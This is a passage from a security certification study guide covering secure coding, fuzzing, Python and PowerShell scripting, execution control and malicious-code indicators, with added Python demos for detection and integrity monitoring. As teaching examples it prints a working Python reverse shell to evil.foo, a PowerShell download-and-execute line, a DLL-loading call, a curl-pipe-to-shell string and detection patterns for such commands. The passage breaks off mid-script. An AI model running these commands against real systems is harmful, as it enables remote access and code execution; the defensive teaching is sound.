implements some sort of standard functionality, such as establishing a network
connection or performing cryptography. Each library must be monitored for
vulnerabilities and patched promptly.

• Software development kit (SDK)—using sample code or libraries of pre-built
functions from the programming environment used to create the software or
interact with a third-party API. As with other third-party libraries or code, it is
imperative to monitor for vulnerabilities.

• Stored procedures—using a pre-built function to perform a database query.
A stored procedure is a part of a database that executes a custom query. The
procedure is supplied an input by the calling program and returns a pre-defined
output for matched records. This can provide a more secure means of querying the
database. Any stored procedures that are part of the database but not required by
the application should be disabled.

Other Secure Coding Practices
Show Slide(s): Other Secure Coding Practices

Input and error handling plus secure reuse of existing code cover some of the
main security-related development practices that you should be aware of. There
are a few other issues that can arise during the development and deployment of
application code.

Unreachable Code and Dead Code

Unreachable code is a part of application source code that can never be executed. For
example, there may be a routine within a logic statement (If ... Then) that can never
be called because the conditions that would call it can never be met. Dead code is
executed but has no effect on the program flow. For example, there may be code to
perform a calculation, but the result is never stored as a variable or used to evaluate
a condition.

This type of code may be introduced through carelessly reused code, or when a block
of code is rewritten or changed. Unreachable and dead code should be removed
from the application to forestall the possibility that it could be misused in some way.
The presence of unreachable/dead code can indicate that the application is not being
well maintained.

Obfuscation/Camouflage

It is important that code be well documented, to assist the efforts of multiple
programmers working on the same project. Well-documented code is also easier to
analyze, however, which may assist the development of attacks. Code can be made
difficult to analyze by using an obfuscator, which is software that randomizes the
names of variables, constants, functions, and procedures, removes comments and
white space, and performs other operations to make the compiled code physically
and mentally difficult to read and follow. This sort of technique might be used to
make reverse engineering an application more difficult and as a way of disguising
malware code.

Static Code Analysis
Show Slide(s): Static Code Analysis

Development is only one stage in the software life cycle. A new release of an
application or automation script should be audited to ensure that it meets the goals of
confidentiality, integrity, and availability critical to any secure computer system.

Static code analysis (or source code analysis) is performed against the application
code before it is packaged as an executable process. The analysis software must
support the programming language used by the source code. The software will scan
the source code for signatures of known issues, such as OWASP Top 10 Most Critical
Web Application Security Risks or injection vulnerabilities generally. NIST maintains a
list of source code analyzers and their key features (samate.nist.gov/index.php/Source_
Code_Security_Analyzers.html).

Human analysis of software source code is described as a manual code review. It is
important that the code be reviewed by developers (peers) other than the original
coders to try to identify oversights, mistaken assumptions, or a lack of knowledge or
experience. It is important to establish a collaborative environment in which reviews
can take place effectively.

Dynamic Code Analysis
Show Slide(s): Dynamic Code Analysis

Static code review techniques will not reveal vulnerabilities that might exist in the
runtime environment, such as exposure to race conditions or unexpected user input.
Dynamic analysis means that the application is tested under "real world" conditions
using a staging environment.

Fuzzing is a means of testing that an application's input validation routines work
well. Fuzzing means that the test or vulnerability scanner generates large amounts
of deliberately invalid and/or random input and records the responses made by
the application. This is a form of "stress testing" that can reveal how robust the
application is. There are generally three types of fuzzers, representing different ways of
injecting manipulated input into the application:

• Application UI—identify input streams accepted by the application, such as input
boxes, command line switches, or import/export functions.

• Protocol—transmit manipulated packets to the application, perhaps using
unexpected values in the headers or payload.

• File format—attempt to open files whose format has been manipulated, perhaps
manipulating specific features of the file.

Fuzzers are also distinguished by the way in which they craft each input (or test
case). The fuzzer may use semi-random input (dumb fuzzer) or might craft specific
input based around known exploit vectors, such as escaped command sequences or
character literals, or by mutating intercepted inputs.

Associated with fuzzing is the concept of stress testing an application to see how an
application performs under extreme performance or usage scenarios.


Finally, the fuzzer needs some means of detecting an application crash and recording
which input sequence generated the crash.

Loading a list of strings for the payload of a fuzzing test in Burp Suite.
(Screenshot Burp Suite portswigger.net/burp.)
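The three pieces described above (a source of test cases, a harness that drives the target, and crash detection that records the offending input) in one small script. This is an added example written for this edit, not code from the guide or from Burp Suite. parse_record is a constructed, deliberately fragile target standing in for the input-handling routine under test, and the payload list is made up for the illustration.

```python
import random

# Constructed target: a tiny "key=value;key=value" record parser with deliberate
# weaknesses (no check for a missing '=' or for a non-numeric age).
def parse_record(data: str) -> dict:
    fields = {}
    for pair in data.split(";"):
        key, value = pair.split("=")      # ValueError if '=' is missing or repeated
        if key == "age":
            value = int(value)            # ValueError if age is not numeric
        fields[key] = value
    return fields

# Known-bad strings, the kind of payload list that would be loaded into Burp Intruder.
# Constructed for this example.
PAYLOADS = ["", "=", ";;", "age=abc", "user=%00", "'; DROP TABLE users;--", "A" * 4096]

def mutate(seed: str, rng: random.Random) -> str:
    """Dumb fuzzing: apply one to four random flips, insertions or deletions to the seed."""
    chars = list(seed)
    for _ in range(rng.randint(1, 4)):
        op = rng.choice(("flip", "insert", "delete"))
        if op == "flip" and chars:
            chars[rng.randrange(len(chars))] = chr(rng.randrange(32, 127))
        elif op == "insert":
            chars.insert(rng.randrange(len(chars) + 1), chr(rng.randrange(0, 127)))
        elif op == "delete" and chars:
            del chars[rng.randrange(len(chars))]
    return "".join(chars)

def fuzz(target, seed: str, iterations: int, rng_seed: int = 1) -> list:
    """Feed the known payloads, then random mutations of seed, to target.
    Any exception counts as a crash; the offending input and the exception type
    are recorded so the case can be replayed. Returns a list of (input, exception_name)."""
    rng = random.Random(rng_seed)       # fixed seed so a run is reproducible
    crashes = []
    cases = list(PAYLOADS) + [mutate(seed, rng) for _ in range(iterations)]
    for case in cases:
        try:
            target(case)
        except Exception as exc:        # crash detection: record input and exception type
            crashes.append((case, type(exc).__name__))
    return crashes

if __name__ == "__main__":
    for case, exc in fuzz(parse_record, "user=alice;age=30", 200):
        print(f"{exc:<12} {case[:60]!r}")
```

Running it prints each crash with the exception name and the input, which is the replay list. A harness for a real target would also watch process exit status and add a hang timeout, since a crash in native code does not surface as a Python exception.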


Review Activity:
Secure Coding Practices
Answer the following questions:

1. What type of programming practice defends against injection-style attacks,
such as inserting SQL commands into a database application from a site
search form?

Input validation provides some mitigation against this type of input being passed to an
application via a user form. Output encoding could provide another layer of protection
by ensuring that the query the script passes to the database is safe; for SQL specifically,
this means parameterized (prepared) queries rather than string concatenation.

2. What coding practice provides specific mitigation against XSS?

Output encoding ensures that strings are made safe for the context they are being
passed to, such as when a JavaScript variable provides output to render as HTML. Safe
means that the string does not contain unauthorized syntax elements, such as script
tags.

3. You are discussing execution and validation security for DOM scripting with
the web team. A junior team member wants to know if this relates to client-
side or server-side code. What is your response?

The Document Object Model (DOM) is the means by which a script (JavaScript) can
change the way a page is rendered. As this change is rendered by the browser, it is
client-side code.

4. Which response header provides protection against SSL stripping attacks?

HTTP Strict Transport Security (HSTS).

5. What vulnerabilities might default error messages reveal?

A default error message might reveal platform information and the workings of the
code to an attacker.

6. What is an SDK and how does it affect secure development?

A software development kit (SDK) contains tools and code examples released by a
vendor to make developing applications within a particular environment (framework,
programming language, OS, and so on) easier. Any element in the SDK could contain
vulnerabilities that could then be transferred to the developer's code or application.

7. What type of dynamic testing tool would you use to check input validation
on a web form?

A fuzzer can be used to submit known unsafe strings and randomized input to test
whether they are made safe by input validation or not.


Topic 14D
Implement Secure Script Environments

EXAM OBJECTIVES COVERED
1.4 Given a scenario, analyze potential indicators associated with network attacks
3.2 Given a scenario, implement host or application security solutions
4.1 Given a scenario, use the appropriate tool to assess organizational security

Teaching Tip: This topic focuses on the uses and abuses of Python and PowerShell. We also
cover the application security/code signing/execution control examples from
objective 3.2.

As a security technician, you will often have to develop automation scripts, using a
range of programming and scripting languages. Scripts can be used to return critical
security assessment data and to configure hosts, so it is important that only validated
code can be executed. You should also be able to identify malicious code in scripts
and macros.

Show Slide(s): Scripting

Scripting

Teaching Tip: Aim to provide a broad overview of scripting technologies and practices.
We will return to orchestration in a bit more detail in the next lesson.

Automation using scripting means that each configuration or build task is performed
by a block of code. The script will take standard arguments as data, so there is less
scope for uncertainty over configuration choices leading to errors. A script will use the
following elements:
• Parameters that the script takes as input data (passed to the script as arguments).

• Branching and looping statements that can alter the flow of execution based on
logic conditions.

• Validation and error handlers to check inputs and ensure robust execution.

• Unit tests to ensure that the script returns the expected outputs, given the
expected inputs.
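The four elements listed above in one small automation script: it takes host:port targets as parameters, validates each one, handles bad input without aborting the whole run, branches on the port to choose a check, and carries its own unit test. This is an added example written for this edit, not part of the guide. The check names (ssh-banner, tcp-open) and the rule that only private addresses are in scope are assumptions for the illustration.

```python
"""Build a port-check plan from host:port arguments (constructed example)."""
import argparse
import ipaddress
import sys

ALLOWED_PORTS = range(1, 65536)

def parse_target(spec: str) -> tuple:
    """Validate a 'host:port' argument. Returns (ip_address, port) or raises ValueError.
    rpartition keeps IPv6 literals such as [::1]:22 working."""
    host, sep, port = spec.rpartition(":")
    if not sep:
        raise ValueError(f"missing port in {spec!r}")
    ip = ipaddress.ip_address(host.strip("[]"))   # ValueError unless an IPv4/IPv6 literal
    if not port.isdigit() or int(port) not in ALLOWED_PORTS:
        raise ValueError(f"bad port in {spec!r}")
    return ip, int(port)

def plan_checks(specs, allow_private_only=True):
    """Loop over the inputs, validate each, and branch on the result.
    Returns (plan, rejected): accepted checks and the inputs skipped with a reason."""
    plan, rejected = [], []
    for spec in specs:
        try:
            ip, port = parse_target(spec)
        except ValueError as exc:                 # error handler: record and carry on
            rejected.append((spec, str(exc)))
            continue
        if allow_private_only and not ip.is_private:
            rejected.append((spec, "public address not in scope"))
            continue
        plan.append({"ip": str(ip), "port": port,
                     "check": "ssh-banner" if port == 22 else "tcp-open"})
    return plan, rejected

def self_test() -> bool:
    """Unit test: expected outputs for expected inputs."""
    plan, rejected = plan_checks(["10.0.0.5:22", "8.8.8.8:53", "10.0.0.7"])
    assert [p["ip"] for p in plan] == ["10.0.0.5"]
    assert plan[0]["check"] == "ssh-banner"
    assert [r[0] for r in rejected] == ["8.8.8.8:53", "10.0.0.7"]
    return True

def main(argv=None) -> int:
    parser = argparse.ArgumentParser(description="Build a port-check plan from host:port arguments")
    parser.add_argument("targets", nargs="+", help="host:port, e.g. 10.0.0.5:22")
    parser.add_argument("--allow-public", action="store_true", help="do not restrict to private ranges")
    args = parser.parse_args(argv)
    plan, rejected = plan_checks(args.targets, allow_private_only=not args.allow_public)
    for item in plan:
        print(f"CHECK {item['check']} {item['ip']}:{item['port']}")
    for spec, reason in rejected:
        print(f"SKIP  {spec}: {reason}", file=sys.stderr)
    return 0 if plan else 1

if __name__ == "__main__":
    self_test()
    sys.exit(main())
```

Rejected inputs go to stderr and the exit status reports whether anything was left to do, so the script behaves predictably when another automation step calls it.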

Popular scripting languages for automation include PowerShell (docs.microsoft.
com/en-us/powershell/scripting/overview?view=powershell-7), Python (python.org),
JavaScript (w3schools.com/js), Ruby (ruby-lang.org/en), and Go (golang.org). Scripting
will also make use of domain-specific languages, such as SQL, XML parsing, regex, and
orchestration tools.

Show Slide(s): Python Script Environment

A scripting language like Python is a general purpose or procedural language. It can be
adapted to perform many tasks. A domain-specific language (DSL) performs a particular
task, such as regex string parsing. Orchestration manages multiple automation scripts and
configuration data to provision a service.

All coding languages have a specific syntax that constrains the way sections of code are
laid out in blocks and the standard statements that are available, such as branching
and looping constructions.

Python Script Environment

Teaching Tip: Given the time allowed, just try to ensure that students can identify Python
code and interpret basic code structures, such as function definitions, function
calls, and logical tests.

Python is a popular language for implementing all kinds of development projects,
including automation tools and security tools, as well as malicious scripts (python.org).
Where many languages use brackets to denote blocks of code, Python uses indentation
(4 spaces per level, by convention). Any statement that starts a block is delimited by
a colon. Python is case-sensitive; for example, the variable user cannot be referred
to by the label User or USER. Comment lines are marked by the # character. You can
view inline help on modules, functions, and keywords using the help statement. For
example, the following command shows help for the print function: help(print)

Variables
Python uses the = operator to assign a name to a variable. Names are not declared
with a data type, such as string or integer, but Python is strongly typed, meaning that
you cannot add an integer variable to a string variable, for instance, without converting
one of them first. String literals can be delimited using single or double quotes.

Functions
Functions are used to produce modular, reusable code. A function takes some
arguments as parameters, performs some processing, and typically returns some
output. When creating a script, you will use some functions from Python's modules and
define your own functions. A function is defined using the following indentation syntax:

    def fullname(name,surname):
        return name + " " + surname
    #This ends the function definition
    #The next line calls the function to set a variable
    greeting = 'Hello ' + fullname('World', '')
    print(greeting)

Logic and Looping Statements


Branching and looping statements let you test conditions and perform repetitive
actions using compact code. Python uses the following comparison operators:

Operator Operation
== Is equal to
!= Is not equal to
< Is less than
> Is greater than
<= Is less than or equal to
>= Is greater than or equal to

A control block is written with indentation in the following general form:

    if name == 'World':
        #These indented statements are only executed if the condition is true
        print('Enter your first name')
        name = input()
        print('Enter your surname')
        surname = input()
    #This ends the if statement as the next line is not indented
    greeting = 'Hello ' + fullname(name,surname)

Python uses only if for branching logic, though complex nested conditions can be
simplified with else and elif (else if). Loops can be constructed using for and while.

Modules
A Python module is a library of functions for accomplishing standard tasks, such
as opening a network socket or interacting with an operating system's API. One of
the perceived strengths of Python is the huge number of modules. For example,
the os module contains functions to interact with the operating system, while the
socket module handles network connections and the urllib package opens and parses
resource addresses. Various extension modules allow a Python script to interact with
Windows APIs.

The presence of two malicious libraries within a Python repository illustrates the potential
risks of third-party code (zdnet.com/article/two-malicious-python-libraries-
removed-from-pypi/).

Execution
Python is an interpreted language, executed within the context of a binary Python
process. In Windows, a Python script (.py) can be called via python.exe (with a
command window) or pythonw.exe (with no command window). A Python script can
also be compiled to a standalone Windows executable using the py2exe extension. This
executable can be digitally signed.

Show Slide(s): PowerShell Script Environment

PowerShell Script Environment

Teaching Tip: Again, just try to ensure that students can recognize PowerShell code and
syntax.

PowerShell is the preferred method of performing Windows administration tasks (docs.
microsoft.com/en-us/powershell/scripting/overview?view=powershell-7). It has also
become the Windows hacker's go-to toolkit. PowerShell statements can be executed at a
PowerShell prompt, or run as a script (.ps1) on any PowerShell-enabled host.

The Get-Help cmdlet shows help on different elements of the PowerShell environment.
PowerShell is case-insensitive.

Cmdlets and Functions
Most PowerShell usage is founded on cmdlets. A cmdlet is a compiled library that
exposes some configuration or administrative task, such as starting a VM in Hyper-V.
Cmdlets use a Verb-Noun naming convention. Cmdlets always return an object.
Typically, the return from a cmdlet will be piped to some other cmdlet or function.
For example:

    Get-Process | Where { $_.name -eq 'nmap' } | Format-List

You can also define simple functions for use within your scripts. Custom functions are
declared within curly brackets:

    function Cat-Name {
        param ($name,$surname)
        return $name + ' ' + $surname
    }
    #This ends the function declaration; the next statement calls it.
    #PowerShell functions take space-separated arguments, not a parenthesized list.
    $greeting = 'Hello ' + $(Cat-Name 'World' '')
    Write-Host $greeting

Note that a variable is declared by prefixing a label with $.

Logic and Looping Statements


PowerShell supports a wider range of branching and looping structures than Python,
including the switch and do statements. Curly brackets are used to structure the
statements. PowerShell uses textual operators (-eq, -ne, -lt, -gt, -le, and -ge).

Modules
PowerShell can also be used with a large number of modules, which are added to a
script using the Import-Module cmdlet.

Varonis' blog series illustrates uses of PowerShell as a security administration platform
(varonis.com/blog/practical-powershell-for-it-security-part-i-file-event-monitoring).

Execution Control

Show Slide(s): Execution Control

Execution control is the process of determining what additional software or scripts
may be installed or run on a host beyond its baseline.

Allow and Block Lists

Teaching Tip: Terminology such as black/whitelist is non-inclusive and is being replaced by
neutral terms (block/allow lists).

Execution control can be implemented as either an allow list or a block list.

• Allow list is a highly restrictive policy that means only running authorized processes
and scripts. Allowing only specific applications that have been added to a list will
inevitably hamper users at some point and increase support time and costs. For
example, a user might need to install a conferencing application at short notice.

• Block list is a permissive policy that only prevents execution of listed processes
and scripts. It is vulnerable to software that has not previously been identified as
malicious (or capable of or vulnerable to malicious use).

These concepts can also be referred to as whitelists and blacklists, but most sources now
deprecate this type of non-inclusive terminology.
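Allow-list and block-list semantics side by side, as an added example written for this edit. It is not the guide's code and it is not how SRP or AppLocker are implemented internally; rules are keyed by SHA-256 digest or by directory to mirror the hash and path rule types those products offer. The executables, directories and rule sets are constructed for the illustration.

```python
import hashlib
from pathlib import PureWindowsPath

def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def under_directory(rule_dir: str, candidate: str) -> bool:
    """True if candidate lies inside rule_dir. Compares path components rather than
    string prefixes, so a rule for C:\\Program Files does not match C:\\Program Files (x86)."""
    return PureWindowsPath(rule_dir) in PureWindowsPath(candidate).parents

def is_listed(candidate_path: str, candidate_bytes: bytes, rules: dict) -> bool:
    """Listed if the file's hash is in rules['hashes'] or it lives under a rules['paths'] entry."""
    if sha256_bytes(candidate_bytes) in rules.get("hashes", set()):
        return True
    return any(under_directory(d, candidate_path) for d in rules.get("paths", []))

def decide(candidate_path: str, candidate_bytes: bytes, rules: dict, mode: str) -> str:
    """mode='allow': only listed items run; mode='block': everything except listed items runs."""
    listed = is_listed(candidate_path, candidate_bytes, rules)
    if mode == "allow":
        return "RUN" if listed else "DENY"
    if mode == "block":
        return "DENY" if listed else "RUN"
    raise ValueError("mode must be 'allow' or 'block'")

# Constructed byte strings standing in for real executables.
GOOD_TOOL = b"MZ\x90\x00constructed-approved-tool"
DROPPER = b"MZ\x90\x00constructed-known-dropper"

ALLOW_RULES = {"hashes": {sha256_bytes(GOOD_TOOL)},
               "paths": ["C:\\Windows", "C:\\Program Files"]}
BLOCK_RULES = {"hashes": {sha256_bytes(DROPPER)}, "paths": []}

def demo() -> dict:
    """Evaluate the same candidates under an allow list and under a block list."""
    cases = {
        "calc from System32":         ("C:\\Windows\\System32\\calc.exe", b"whatever"),
        "approved tool in Downloads": ("C:\\Users\\bob\\Downloads\\tool.exe", GOOD_TOOL),
        "new conferencing app":       ("C:\\Users\\bob\\Downloads\\meet.exe", b"MZ new vendor build"),
        "known dropper":              ("C:\\Users\\bob\\Downloads\\invoice.exe", DROPPER),
        "dropper, one byte changed":  ("C:\\Users\\bob\\Downloads\\invoice.exe", DROPPER + b"\x00"),
    }
    return {name: (decide(p, b, ALLOW_RULES, "allow"), decide(p, b, BLOCK_RULES, "block"))
            for name, (p, b) in cases.items()}

if __name__ == "__main__":
    print(f"{'case':<28}{'allow list':<12}block list")
    for name, (allow, block) in demo().items():
        print(f"{name:<28}{allow:<12}{block}")
```

The conferencing-app case is the support-ticket problem the text describes for allow lists; the last two cases show why a block list fails against unknown or trivially repacked malware, since one appended byte changes the hash. Path rules are only as strong as the ACL on the directory: if users can write anywhere under an allowed location, the rule is bypassed, which is why hash and publisher rules are preferred for anything outside the OS and Program Files trees.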

Code Signing
Code signing is the principal means of proving the authenticity and integrity of code
(an executable or a script). The developer creates a cryptographic hash of the file, then
signs the hash using his or her private key. The program is shipped with a copy of the
developer's code signing certificate, which contains a public key that the destination
computer uses to read and verify the signature. The OS then prompts the user to
choose whether to accept the signature and run the program.

OS-Based Execution Control


Execution control is often enforced using a third-party security product, but there are
some built-in Windows features that can perform the task:


• Software Restriction Policies (SRP)—available for most versions and editions of
Windows, can be configured as group policy objects (GPOs) to passlist file
system locations from which executables and scripts can launch. Rules can also be
configured by publisher signature or by file hash. There is also support for creating
blocklist-based rules.

• AppLocker—improves configuration options and default usage of SRP. Notably
AppLocker policies can be applied to user and group accounts rather than just
computer accounts. However, AppLocker GPOs can only be configured for
Enterprise and Ultimate editions of Windows 7 and later.

• Windows Defender Application Control (WDAC)—formerly Device Guard, this can
be used to create Code Integrity (CI) policies, which can be used on their own or
in conjunction with AppLocker. CI policies apply to the computer and affect all
users. CI policies can be based on version-aware and publisher digital signatures,
as well as image hashes and/or file paths. WDAC is a useful option for preventing
administrator accounts from disabling execution control options (docs.microsoft.
com/en-us/windows/security/threat-protection/windows-defender-application-
control/windows-defender-application-control). WDAC is principally configured
using XML policy statements and PowerShell.

In Windows, execution of PowerShell scripts can be inhibited by the execution policy. Note
that the execution policy is not an access control mechanism. It can be bypassed in any
number of different ways. WDAC is a robust mechanism for restricting use of potentially
dangerous code, such as malicious PowerShell.

In Linux, execution control is normally enforced by using a mandatory access control
(MAC) kernel module or Linux Security Module (LSM). The two main LSMs are
SELinux (access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/
deployment_guide/ch-selinux) and AppArmor (wiki.ubuntu.com/AppArmor).

Show Slide(s): Malicious Code Indicators

Malicious Code Indicators

Teaching Tip: Note that indicators are mostly gathered from the way a malicious process
interacts with the system. This evidence is gathered through logging. The purpose of
EDR-type products is to provide real-time automated analysis of code execution.

As with buffer overflow, indicators of malicious code execution are either caught by
endpoint protection software or discovered after the fact in logs of how the malware
interacted with the network, file system, and registry. If you are performing threat
hunting or observing malware in a sandbox, it is helpful to consider the main types of
malicious activity:

• Shellcode—this is a minimal program designed to exploit a buffer overflow or
similar vulnerability to gain privileges, or to drop a backdoor on the host if run as
a Trojan (attack.mitre.org/tactics/TA0002). Having gained a foothold, this type of
attack will be followed by some type of network connection to download additional
tools.

• Credential dumping—the malware might try to access the credentials file (SAM) on
a local Windows workstation or sniff credentials held in memory by the lsass.exe
system process (attack.mitre.org/tactics/TA0006).

• Lateral movement/insider attack—the general procedure is to use the foothold
to execute a process remotely, using a tool such as psexec (docs.microsoft.com/
en-us/sysinternals/downloads/psexec) or PowerShell (attack.mitre.org/tactics/
TA0008). The attacker might be seeking data assets or may try to widen access
by changing the system security configuration, such as opening a firewall port or
creating an account. If the attacker has compromised an account, these commands
can blend in with ordinary network operations, though they could be anomalous
behavior for that account.


• Persistence—this is a mechanism that ensures the threat actor's backdoor is restarted if the
host reboots or the user logs off (attack.mitre.org/tactics/TA0003). Typical methods
are to use AutoRun keys in the registry, adding a scheduled task, or using Windows
Management Instrumentation (WMI) event subscriptions.

PowerShell Malicious Indicators

Show Slide(s): PowerShell Malicious Indicators

Teaching Tip: Aim to give students basic recognition of common attack frameworks and
potentially suspicious cmdlets and usages.

There are numerous exploit frameworks to leverage PowerShell functionality, such as
PowerShell Empire, PowerSploit, Metasploit, and Mimikatz. Some suspicious indicators
for PowerShell execution include the following:
• Cmdlets such as Invoke-Expression, Invoke-Command, Invoke-WMIMethod, New-
Service, Start-Process, and New-Object, and API calls such as CreateThread, can
indicate an attempt to run some type of binary shellcode. This is particularly
suspicious if combined with a DownloadString or DownloadFile argument. One
complication is that cmdlets have short aliases, assisting obfuscation. For example,
Invoke-Expression can be run using IEX.

    powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://badsite.foo/DoEvil.ps1'); Do-Evil -StealCreds"

• Bypassing execution policy can also act as an indicator. The PowerShell code may be
called as a Base64 encoded string (-enc argument) or may use the -noprofile
or -ExecutionPolicy bypass arguments.

• Using system calls to the Windows API might indicate an attempt to inject a DLL
or perform process hollowing, where the malicious code takes over a legitimate
process:

    [Kernel32]::LoadLibrary("C:\Users\Foo\AppData\Local\Temp\doevil.dll")

• Using another type of script to execute the PowerShell is also suspicious. For
example, the attacker might use JavaScript code embedded in a PDF to launch
PowerShell via a vulnerable reader app.
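The indicators above turned into a scoring pass over process-creation command lines, as an added example written for this edit (not code from the guide or from any of the frameworks named). The sample event lines, the indicator weights and the alert threshold are constructed for the illustration; the one detail taken from real tooling is that an -EncodedCommand payload is Base64 over UTF-16LE, which is why the decoder uses that encoding.

```python
import base64
import re

# Indicator patterns drawn from the list above; each hit adds its weight to the score.
INDICATORS = [
    (r"\b(?:iex|invoke-expression)\b", 3, "invoke-expression/IEX"),
    (r"\b(?:invoke-command|invoke-wmimethod|new-service|start-process|new-object)\b", 1, "remote/launch cmdlet"),
    (r"\bdownload(?:string|file)\b", 3, "web download"),
    (r"-(?:ep|exec|executionpolicy)\s+bypass\b", 2, "execution policy bypass"),
    (r"-(?:nop|noprofile)\b", 1, "no profile"),
    (r"-(?:w|windowstyle)\s+hidden\b", 1, "hidden window"),
    (r"\[kernel32\]::|virtualalloc|createthread|loadlibrary", 3, "Win32 API call"),
]

# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob.
ENC_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (Base64 over UTF-16LE) or None."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_command(cmdline: str):
    """Scan the visible command line plus any decoded payload. Returns (score, [reasons])."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + ("\n" + decoded if decoded else "")
    score, reasons = 0, []
    if decoded:
        score += 2
        reasons.append("encoded command")
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, text, re.IGNORECASE):
            score += weight
            reasons.append(label)
    return score, reasons

def encode_powershell(script: str) -> str:
    """What an attacker does to build an -enc argument; used here only to construct the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed command lines in the style of a 4688 / Sysmon event 1 CommandLine field.
SAMPLE_LOG = [
    "powershell.exe -NoProfile -Command Get-Service -Name Spooler",
    "powershell.exe \"IEX (New-Object Net.WebClient).DownloadString('https://badsite.foo/DoEvil.ps1'); Do-Evil -StealCreds\"",
    "powershell.exe -nop -w hidden -ep bypass -enc " + encode_powershell(
        "[Kernel32]::LoadLibrary('C:\\Users\\Foo\\AppData\\Local\\Temp\\doevil.dll')"),
]

def triage(lines, threshold=4):
    """Return (score, reasons, line) for lines at or above the threshold, highest first."""
    scored = [(score_command(line), line) for line in lines]
    return sorted(((s, r, line) for (s, r), line in scored if s >= threshold), reverse=True)

if __name__ == "__main__":
    for score, reasons, line in triage(SAMPLE_LOG):
        print(f"{score:2d} {', '.join(reasons)}\n   {line[:100]}")
```

The first line scores 1 (an administrator using -NoProfile) and stays below the threshold; the encoded line only reveals the Win32 API call after decoding, which is the point of scanning the payload and not just the visible arguments. In production the same pass runs over 4688 or Sysmon command lines and is complemented by script block logging (event 4104), which records the script as PowerShell executed it after de-obfuscation.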

The big problem with PowerShell indicators is distinguishing them from legitimate
behavior. The following techniques can be used to assist with this:
• Use group policy to restrict execution of PowerShell to trusted accounts and hosts.

• Use group policy execution control to run scripts only from trusted locations.

• Consider use of Constrained Language Mode (devblogs.microsoft.com/powershell/
powershell-constrained-language-mode) and signed scripts to limit the ability of
exploit code to run on high-value target systems.

• Use PowerShell logging (docs.microsoft.com/en-us/powershell/scripting/windows-
powershell/wmf/whats-new/script-logging?view=powershell-7) and the Antimalware
Scan Interface (docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps) to
detect and prevent obfuscated and suspicious code.

• Prevent the use of old PowerShell versions to mitigate the use of a downgrade
attack to bypass these controls (PowerShell 2.0 has neither script block logging nor
AMSI integration, so powershell.exe -Version 2 evades both).

Symantec's white paper contains a useful introduction to PowerShell exploits
(docs.broadcom.com/doc/increased-use-of-powershell-in-attacks-16-en).


Show Slide(s): Bash and Python Malicious Indicators

Bash and Python Malicious Indicators

Most of the web runs on Linux, and Linux has proven remarkably resilient to attack,
given the high value of the assets that depend on it. Most exploits of Linux systems
depend on weak configuration and/or vulnerabilities in web applications. In Linux, the
command line is usually Bourne Again Shell (Bash). Many Linux systems have Python
enabled as well. Python scripts or batch files of bash commands can be used for
automation tasks, such as backup, or for malicious purposes.
A malicious script running on a Linux host might attempt the following:
1. Use commands such as whoami and ifconfig/ip/route to establish the
local context.

2. Download tools, possibly using wget or curl.

3. Add crontab entries to enable persistence.

4. Add a user to sudo and enable remote access via SSH.

5. Change firewall rules using iptables.

6. Use tools such as Nmap to scan for other hosts.

A very common vector for attacking Linux hosts is to use an exploit to install a web
shell as a backdoor (acunetix.com/blog/articles/introduction-web-shells-part-1). Typical
code to implement a reverse shell (connecting out to the machine at evil.foo on port
4444) is as follows:

    import socket, os, pty
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("evil.foo",4444))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    pty.spawn("/bin/sh")

The os.dup2 statements redirect the terminal's data streams stdin (0), stdout (1),
and stderr (2) to the socket object (s). The pty module provides a library of functions
for managing a pseudo-terminal, in this case starting the shell process at /bin/sh.
The code to implement a shell can be obfuscated in numerous ways. One way to
identify malicious scripts other than trying to match code samples is to scan the file
system against a configuration baseline, either using file integrity monitoring or the
Linux diff command.
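A minimal file integrity monitor of the kind the paragraph above refers to, as an added example written for this edit (not code from the guide). It baselines SHA-256 digests and permission bits for every file under a root and reports what was added, removed or changed. The web root, its files and the simulated web-shell drop are all constructed inside a temporary directory so the script runs offline.

```python
import hashlib
import json
import tempfile
from pathlib import Path

def digest_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot(root) -> dict:
    """Map relative path -> {"sha256", "mode"} for every regular file under root.
    Mode bits are recorded because chmod +x on a dropped script is itself an indicator."""
    root = Path(root)
    baseline = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file() and not p.is_symlink()):
        rel = path.relative_to(root).as_posix()
        baseline[rel] = {"sha256": digest_file(path), "mode": oct(path.stat().st_mode & 0o777)}
    return baseline

def compare(baseline: dict, current: dict) -> dict:
    """Classify the differences between two snapshots."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}

def save_baseline(baseline: dict, path):
    Path(path).write_text(json.dumps(baseline, indent=1, sort_keys=True))

def load_baseline(path) -> dict:
    return json.loads(Path(path).read_text())

def demo() -> dict:
    """Constructed scenario: baseline a small web root, then simulate an intrusion
    that drops a reverse-shell script and appends a download to an existing CGI script."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp, "www")
        (root / "cgi-bin").mkdir(parents=True)
        (root / "index.html").write_text("<h1>hello</h1>\n")
        (root / "cgi-bin" / "app.py").write_text("print('ok')\n")
        save_baseline(snapshot(root), Path(tmp, "baseline.json"))

        # attacker activity (written as text only; nothing here is executed)
        (root / "cgi-bin" / "shell.py").write_text("import socket, os, pty\n# ... reverse shell ...\n")
        with (root / "cgi-bin" / "app.py").open("a") as f:
            f.write("os.system('curl https://evil.foo/x.sh | sh')\n")

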